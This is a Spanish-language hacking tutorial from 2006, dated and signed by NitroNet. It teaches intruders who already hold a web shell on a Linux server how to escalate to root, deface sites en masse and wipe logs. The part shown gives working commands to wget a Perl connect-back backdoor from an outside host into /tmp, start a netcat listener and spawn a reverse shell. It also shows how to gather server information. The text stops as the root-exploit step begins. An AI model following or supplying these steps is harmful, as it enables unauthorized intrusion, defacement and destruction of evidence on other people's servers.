Hacking general

Acediendo Como R00t y Haciendo
un Mass Defacement.

*****9/10/2006******

By NitroNet – wWw.ZeroHack.Net

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~INDICE~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1-# Introdución
2-# Explicación de Permisos
3-# Acomodando Backshell en el Server
4-# Poniendo a la Escucha NetCat
5-# Onteniendo Informacion del Server
7-# Dar permisos y Ejecutar elBinario (r00texploit)
8-# Haciendo el Mass Defacement
9-# Borrando log’s
10-# Despedida
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~~~~~~~~~~~~
1-# Introdución
~~~~~~~~~~~~~~

Hola Amigos!
En este tutorial les voy a explicar como conseguir acesso r00t en un server LinuX.
Tambien se explicara como hacer el mass defacement, borrarlogs y algun par de cosas mas.
Espero ke les guste ;=)

Empezemos con el asunto [pic]

~~~~~~~~~~~~~~~~~~~~~~~~~~~
2-# Explicación de Permisos
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Cuando tenemos haceso a un Server con una shell, nos fijamos que al lado de cada
archivo o carpeta nos salen estas letras:

(R) Lectura
(W) Escritura
(x) Ejecutación
(d) Directorio
(-) No tenemos permiso deescritura

Cuando estes en netcat y pulses ls para ver los archivos y directorios ke hay, no les saldran
los permisos que tene cada carpeta para verlos, en vez de solo poner ls, le añadimos -la

Ejemplo:
Código:
ls -la

Y a la izquierda del todo les saldran hay los permisos [pic]
No solo les saldran los permisos, sino tambien la fecha que se subio, hora, etc…

Weno pues hay se les kitaronlas dudas, ya saben lo que significa cada letra [pic]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
3-# Acomodando Backshell en el Server
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ahora subimos una backshell como la datach0s o la in que son backshells en perl.
Este tuto lo guiare con la datacha0s.
La subiremos en el directorio /tmp/ que es un directorio donde se guardan archivos temporales
y en un 99%de los servers tendremos permisos de escritura [pic]

Para ir al directorio /tmp/ y subir la backshell ejecutaremos lo siguiente:

Código:
cd /tmp/;wget usuarios.lycos.es/teamzer0/backdoors/dc.pl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
4-# Poniendo a la Escucha NetCat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Una vez subida la dc.pl, dejamos el netcat en nuestro PC a la escucha, en este caso
dejaremos ala escucha el puerto 9000 poniendo lo siguiente:
Código:
-lvvp 9000
Cuando le pongamos a la escucha deberia aparecer lo siguiente:
Código:
listening on [any] 9000 …
Ahora ya vamos a la shell y ejecutamos la dc.pl para conectarnos a nuestro PC de la
siguiente manera:
Código:
perl dc.pl TUIP PUERTOaLAescuchaENnetcat
Ejemplo:
Código:
perl dc.pl 10.0.1.251 9000
Nos Saldra lo siguienteen nuestra shell si se conecta a nuestro PC.

Data Cha0s Connect Back Backdoor
Código:
[*] Dumping Arguments
[*] Connecting…
[*] Spawning Shell
[*] Datached

Ahora nos fijamos en netcat y nos aparecera ke nos hemos conectado.
Parecido a esto:
Código:
connect to [81.47.74.9] from euirc.gr [66.225.230.248] 57566
Hay ya tamos conectados al server desde nuestro PC [pic]
Weno ahora laphp shell con lo ke subimos la dc y nos conectamos ya la podemos cerrar, ya que
ahora aremos todo ejecutando comandos desde la shell ke tenemos en netcat [pic]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
5-# Onteniendo Informacion del Server
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ponemos en el netcat:
Código:
pwd;uname -a

Significado de cada Comando:
id: Te dice en el Directorio que estasuname -a: Informacion del Sistema

Al ejecutar eso les deberia salir algo parecido a esto:
Código:
/tmp
Linux server.corpoweb.com 2.4.20-021stab028.24.777-enterprise #1 SMP Fri Jan 6
9:39:27 MSK 2006 i686 athlon i386 GNU/Linux

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
7-# Dar permisos y Ejecutar el Binario (r00texploit)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Weno…